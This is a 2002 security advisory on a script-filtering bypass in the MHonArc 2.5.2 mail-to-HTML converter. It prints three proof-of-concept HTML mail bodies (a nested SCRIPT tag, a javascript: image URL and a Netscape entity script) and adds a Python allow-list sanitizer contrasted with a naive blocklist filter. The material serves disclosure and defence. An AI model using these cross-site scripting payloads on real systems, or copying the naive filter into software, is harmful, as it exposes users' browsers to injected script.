
MHonArc script filtering bypass vulnerability
19th Apr 2002 [SBWID-5291]
COMMAND

	MHonArc script filtering bypass vulnerability

SYSTEMS AFFECTED

	MHonArc v2.5.2

PROBLEM

	Hiromitsu Takagi reported the following about MHonArc, a Perl
	mail-to-HTML converter. MHonArc provides HTML mail archiving with index,
	mail thread linking, etc., plus other capabilities including support for
	MIME and powerful user customization features (according to its website
	[http://www.mhonarc.org/]).

	MHonArc has a feature that filters out scripting tags from incoming
	HTML mail, and it is enabled by default. However, some variations of
	scripting tags are not filtered.

	Exploit 1:
	----------
	  From: test@example.com
	  To: test@example.com
	  Date: Sun, 16 Dec 2001 00:00:00 +0900
	  Subject: test
	  MIME-Version: 1.0
	  Content-Type: text/html

	  <HTML>
	  <SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>
	  </HTML>
	----------

	

	Exploit 2:
	----------
	  From: test@example.com
	  To: test@example.com
	  Date: Sun, 16 Dec 2001 00:00:00 +0900
	  Subject: test
	  MIME-Version: 1.0
	  Content-Type: text/html

	  <HTML>
	  <IMG SRC=javascript:alert(document.domain)>
	  </HTML>
	----------

	

	Exploit 3:
	----------
	  From: test@example.com
	  To: test@example.com
	  Date: Sun, 16 Dec 2001 00:00:00 +0900
	  Subject: test
	  MIME-Version: 1.0
	  Content-Type: text/html

	  <HTML>
	  <B foo=&{alert(document.domain)};>
	  Vulnerable only if Netscape 4.x is used to browse.</B>
	  </HTML>
	----------
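
	An added example, not MHonArc's code and not part of the original advisory: the three HTML bodies above run through an allow-list sanitizer that rebuilds its output from parsed events, beside `naive_strip`, a hypothetical single-pass blocklist filter. The function names, the tag and URL-scheme policy, and the assumption that a filter of this class is involved are all choices made for this example.

```python
import re
from html import escape
from html.parser import HTMLParser

# Hypothetical single-pass blocklist filter; a stand-in, not MHonArc's code.
def naive_strip(html):
    return re.sub(r"(?i)</?script[^>]*>", "", html)

# Assumed policy for this example: a few tags, URL attributes only.
ALLOWED_TAGS = {"b", "i", "p", "br", "img", "a"}
VOID_TAGS = {"br", "img"}
URL_ATTRS = {"img": {"src"}, "a": {"href"}}
SAFE_URL = re.compile(r"(?i)^(https?|mailto|cid):")

class AllowListSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0   # skip > 0 while inside script/style

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
        elif not self.skip and tag in ALLOWED_TAGS:
            kept = "".join(
                f' {n}="{escape(v.strip(), quote=True)}"' for n, v in attrs
                if n in URL_ATTRS.get(tag, ()) and v and SAFE_URL.match(v.strip()))
            self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS - VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))   # text is always re-escaped

def sanitize(html):
    parser = AllowListSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)

SAMPLES = [  # HTML bodies from the advisory (text of the third shortened)
    "<SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>",
    "<IMG SRC=javascript:alert(document.domain)>",
    "<B foo=&{alert(document.domain)};>text</B>",
]
```

	Deleting the inner tags from the first sample joins the surrounding fragments into a working SCRIPT element, and the other two samples contain no SCRIPT tag at all, so only the allow-list path neutralizes all three.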

	

SOLUTION

	Upgrade to MHonArc v2.5.3
	

	
